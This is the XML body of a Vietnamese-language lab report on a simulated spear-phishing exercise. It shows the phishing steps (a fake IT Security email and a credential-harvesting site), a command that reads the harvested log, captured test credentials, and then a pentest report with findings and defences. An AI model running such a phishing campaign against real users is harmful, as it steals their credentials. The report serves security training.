        <w:spacing w:after="4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BA057F" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="91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15: (Victim) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49719C6C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="406"/>
          <w:tab w:val="center" w:pos="1012"/>
        </w:tabs>
        <w:spacing w:after="209" w:line="249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Nhập: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268AB96C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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user: admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F82413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pass: 123456 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CBD73" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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4CC8BB" w14:textId="77777777" w:rsidR="00513389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16: (Attacker – Kali) Kiểm tra dữ liệu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD93C3" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="487" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2862" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /var/www/html/phishing/log.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA73E9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2026-03-17 | admin | 123456 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D83D8" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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D7B2E8" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Phân tích kết quả </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F76C64" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="89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17: (Attacker – Kali) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05E06A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="310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Đánh giá: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F232A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Nạn nhân nhập thông tin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74E83C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Không kiểm tra URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F92F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FE27CD" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="238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Bị đánh lừa bởi tính khẩn cấp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F92F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49D3CB" w14:textId="77777777" w:rsidR="0051338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4ED0EF" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="7"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Phòng chống </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B257E3" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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E26B12" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="87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Bước 18: Đề xuất </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63324F94" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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MFA (Multi-Factor Authentication) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23C9E4" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Training nhân viên </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405039A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Email filtering </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67E144" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="265" w:line="249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HTTPS + kiểm tra domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F39E1FD" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="46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9FA383" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000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12. VIẾT BÁO CÁO PENTEST (HOÀN CHỈNH) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0950DB7E" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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0130C2" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 1. Executive Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB88754" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="270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Trong quá trình kiểm thử Social Engineering, nhóm đã thực hiện một chiến dịch spear phishing nhằm đánh giá mức độ nhận thức bảo mật của nhân viên. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C56F0" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="265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Kết quả cho thấy: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38102295" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Người dùng đã nhập thông tin đăng nhập vào website giả mạo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B8F76" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="269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Hệ thống thiếu cơ chế bảo vệ như MFA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B79D4" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="380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Rủi ro: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HIGH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CDC3AA" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 2. Scope </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7F7CC" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Phạm vi: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A18EF" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="1090" w:right="4050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Người dùng nội bộ (mô phỏng)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Website giả lập </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB8221" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="265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Không ảnh hưởng hệ thống thật </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AC2F1E" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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984095" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 3. Methodology </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F24DD2" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="270" w:line="253" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="1411" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Theo mô hình pentest: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A06C3F" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Information Gathering </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06658980" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Social Engineering Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0058BA76" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Credential Harvesting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F5F4DE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="262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Analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFC4BE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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EB5197" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 4. Attack Details </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5D9E9" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="225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Kỹ thuật: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA58121" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="253" w:lineRule="auto"/>
        <w:ind w:right="1411" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Spear Phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E57C5C0" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="446" w:lineRule="auto"/>
        <w:ind w:right="1411" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Harvesting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Các bước: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A2CD7" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Tạo email giả IT Security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A728FE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Gửi link phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC7FE6" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Victim truy cập </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21237C6A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="267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Thu thập credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968AA86" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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62C379" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="207"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 5. Findings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1EF45" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2274"/>
          <w:tab w:val="center" w:pos="4300"/>
        </w:tabs>
        <w:spacing w:after="50" w:line="251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ID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Mô tả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Mức độ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74FCB6" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="56" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SE-01 User nhập credential vào site giả HIGH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190FB95F" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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4730AE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 6. Evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45233B68" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="0000000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Ví dụ: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AAE775" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="46" w:line="251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2026-03-17 | admin | 123456 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E7C2B" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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6E89D0" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 7. Risk Analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9C4B6" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="355" w:right="889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Tài khoản có thể bị chiếm quyền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Có thể dẫn đến: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Data breach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Lateral movement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EC2CEB" w14:textId="77777777" w:rsidR="0051338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84130D" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="159"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 8. Recommendations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBD833" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="225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 Kỹ thuật: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78020DBE" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249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Bật MFA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D61D7A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Email gateway filtering </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3570B8" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="292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Domain monitoring </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3331FA72" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="225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 Con người: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61A95A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="253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Security awareness training </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAB58B" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="267" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="1411" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing simulation định kỳ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300352CA" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3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8BD931" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="132"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 9. Conclusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217E88F" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="271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Hệ thống và người dùng hiện tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dễ bị tấn công Social Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Cần triển khai biện pháp bảo mật ngay lập tức. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41772C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4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85C48A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>KẾT LUẬN LAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1B35B" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="311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Nội dung đã thực hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DA8000" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="253" w:lineRule="auto"/>
        <w:ind w:right="1411" w:hanging="360"/>
      </w:pP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OSINT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D66F4" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="253" w:lineRule="auto"/>
        <w:ind w:right="1411" w:hanging="360"/>
      </w:pP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Phishing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E136825" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="253" w:lineRule="auto"/>
        <w:ind w:right="1411" w:hanging="360"/>
      </w:pP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Fake website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F348C" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="253" w:lineRule="auto"/>
        <w:ind w:right="1411" w:hanging="360"/>
      </w:pP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Credential harvesting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFC84A" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="249" w:lineRule="auto"/>
        <w:ind w:right="1411" w:hanging="360"/>
      </w:pP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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Viết báo cáo chuẩn pentest </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751361DF" w14:textId="77777777" w:rsidR="00513389" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00513389">
      <w:pgSz w:w="11906" w:h="16841"/>
      <w:pgMar w:top="2029" w:right="1817" w:bottom="1726" w:left="1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BEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B01A557C"/>
    <w:lvl w:ilvl="0" w:tplc="E07C93EC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FE60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4EA2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B84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B6EC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4A8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88B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5611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4DA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416380"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD642EE4"/>
    <w:lvl w:ilvl="0" w:tplc="587AC9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2C32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4A72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EE30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EC90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0E2A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44DC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9CF7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B49C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D855F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3B28538"/>
    <w:lvl w:ilvl="0" w:tplc="28C8E8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7CF9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A626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C23C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764F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760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14FD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4E5C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800F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ED6ED4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26C26ED4"/>
    <w:lvl w:ilvl="0" w:tplc="44F271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2805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0488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4C76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6E9E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3E27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F40E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5669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E440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495207"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33164796"/>
    <w:lvl w:ilvl="0" w:tplc="9E56DC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A3B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7EB8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ACAC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CC93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BE3A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CC0D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BC30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863F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BF280B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4580D52"/>
    <w:lvl w:ilvl="0" w:tplc="6292011A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66B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FC35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005A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FC07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6A1E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8C1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657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E6FD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2C0915"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E42BA94"/>
    <w:lvl w:ilvl="0" w:tplc="450C73C6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14E52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F040F4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58C63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7C5D7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029AE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E5B0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D6E05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2ADC5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3A3DEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEB00646"/>
    <w:lvl w:ilvl="0" w:tplc="029A11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C9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925D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900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70CE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1EE1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C299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70C1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325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7772FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DA6D588"/>
    <w:lvl w:ilvl="0" w:tplc="6E32FF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CADB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1C75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6E18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3282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0C05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7ED3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72D7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9AD1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0F03BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="457CFDBC"/>
    <w:lvl w:ilvl="0" w:tplc="D3F852E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AD4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02EF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5210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AFA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DE94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F007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F2EC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E25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204A36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66D0C72E"/>
    <w:lvl w:ilvl="0" w:tplc="D220B1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9E43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1228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D47F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4240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5E76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F24A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E6B1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8CB1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391FEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="887C8520"/>
    <w:lvl w:ilvl="0" w:tplc="A524DA0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7646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9802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8D6B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3644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0066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E3B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26C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322B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F568D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF0E84B6"/>
    <w:lvl w:ilvl="0" w:tplc="9C4E0C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EA08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14F4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8CE7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140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7218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48A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708F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2E7F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A2593F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0094A810"/>
    <w:lvl w:ilvl="0" w:tplc="1FD493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FE2D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92E0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6A31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A85A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1493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AAC9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DE1C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CA4A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A04CC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFB09176"/>
    <w:lvl w:ilvl="0" w:tplc="C4BE5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AAF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063B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8296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E69A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543A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324B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629D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9E2E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601699">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1578902907">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1139373611">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2094084948">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="720787594">
    <w:abstractNumId w:val="6"/>
  </w:num>
